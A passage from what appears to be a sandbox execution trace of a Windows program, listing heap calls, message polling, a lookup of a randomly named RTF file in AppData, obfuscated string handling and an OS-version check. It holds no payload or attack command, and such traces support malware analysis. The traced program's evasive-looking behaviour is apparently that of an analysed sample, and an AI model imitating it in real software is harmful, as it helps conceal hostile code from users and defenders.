RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0198.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0198.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0198.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/enrHxcENdtYHa.rtf", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x48584a10, ftCreationTime.dwHighDateTime=0x1d4c8f7, ftLastAccessTime.dwLowDateTime=0xcb7b4b10, ftLastAccessTime.dwHighDateTime=0x1d4cc97, ftLastWriteTime.dwLowDateTime=0xcb7b4b10, ftLastWriteTime.dwHighDateTime=0x1d4cc97, nFileSizeHigh=0x0, nFileSizeLow=0x13e7, dwReserved0=0xfcb0039, dwReserved1=0x13902, cFileName="enrHxcENdtYHa.rtf", cAlternateFileName="ENRHXC~1.RTF")) returned 0xaa58e0 [0198.301] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0198.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.301] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.301] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.301] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.302] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.302] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.302] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.302] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.302] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.303] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0198.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.303] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0198.303] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.304] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0198.304] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.304] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.304] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.304] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.305] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0198.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.306] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.306] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.306] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.306] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.307] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.307] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, 